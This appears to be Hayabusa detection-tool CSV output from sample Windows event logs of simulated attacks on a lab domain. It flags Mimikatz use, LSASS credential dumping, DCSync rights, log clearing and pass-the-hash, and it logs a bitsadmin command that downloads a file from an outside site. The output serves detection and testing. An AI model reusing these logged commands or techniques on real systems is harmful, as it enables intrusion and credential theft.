discovery/ID1-SPN discovery (SYSMON process).evtx 2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,CredAccess,Possible SPN Enumeration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx 2021-02-04 00:17:16.085 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d8 | User: MSSQL01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx 2021-02-04 00:33:16.107 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sqlcmd -S .\RADAR,2020 | Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\110\Tools\Binn\SQLCMD.EXE | PID: 0x1204 | User: admmig | LID: 0x372a4",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-sqlcmd tool abuse in SQL Server.evtx 2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,../hayabusa-rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx 2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,../hayabusa-rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx 2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,../hayabusa-rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx 2021-02-08 22:01:11.198 +09:00,WIN10-client01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\WINDOWS\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b1c | User: WIN10-CLIENT01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1564-Hide artifacts/ID4688-Linux Subsystem installation (WSL).evtx 2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx 2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx 2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx 2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx 2021-02-23 07:57:19.435 +09:00,jump01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2004-Any any firewall rule created.evtx 2021-02-23 08:07:20.794 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: bitsadmin /transfer hackingarticles https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg c:\ignite.png | Path: C:\Windows\System32\bitsadmin.exe | PID: 0x1e00 | User: admmig | LID: 0x92e21,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx 2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: hackingarticles | URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx 2021-02-23 08:08:02.534 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c30 | User: JUMP01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx 2021-03-03 19:24:12.402 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,"Name: Microsoft Office Click-to-Run Service | Path: ""C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"" /service | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx 2021-03-03 19:33:48.102 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,"Name: Microsoft Search in Bing | Path: ""C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx 2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: ab170ec9.png | URL: https://i.imgur.com/IFpvPlt.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: efc1a28b.png | URL: https://i.imgur.com/IFpvPlt.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe | URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe | URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-17 00:50:54.591 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: Npcap Packet Driver (NPCAP) | Path: \SystemRoot\system32\DRIVERS\npcap.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx 2021-03-26 06:56:19.530 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon filter add -p 80 | Path: C:\Windows\System32\PktMon.exe | PID: 0x16d0 | User: admin | LID: 0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx 2021-03-26 06:56:32.794 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon comp list | Path: C:\Windows\System32\PktMon.exe | PID: 0x2b0c | User: admin | LID: 0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx 2021-03-26 06:56:50.874 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stpop | Path: C:\Windows\System32\PktMon.exe | PID: 0x2bdc | User: admin | LID: 0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx 2021-03-26 06:56:53.090 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stop | Path: C:\Windows\System32\PktMon.exe | PID: 0x1bc0 | User: admin | LID: 0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx 2021-03-26 06:57:05.324 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: FX-BS7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx 2021-03-26 06:57:11.415 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb60 | User: FX-BS7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx 2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account: | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx 2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx 2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx 2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx 2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx 2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx 2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx 2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account: | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx 2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx 2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx 2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx 2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,info,Persis,Service Installed,Name: mimidrv | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | User: admmig | SrvAccount: LocalSystem | SrvType: 0x1 | SrvStartType: 2 | LID: 0xcc3c3,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx 2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx 2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,CredAccess | Exec,Credential Dumping Tools Service Execution,,../hayabusa-rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx 2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx 2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx 2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx 2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx 2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,../hayabusa-rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx 2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx 2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx 2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx 2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx 2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx 2021-03-27 05:41:38.966 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx 2021-03-27 05:41:39.009 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx 2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x76073 | PID: 7280 | PGUID: 747F3D96-3A77-607F-0000-00105DD17600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:00.296 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:00.306 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\samir | Process: System | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\user03 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | LID: 0x770575 | PID: 2740 | PGUID: 747F3D96-3A7C-607F-0000-001058067700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-04C3-607F-0000-0010F13B1E00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network 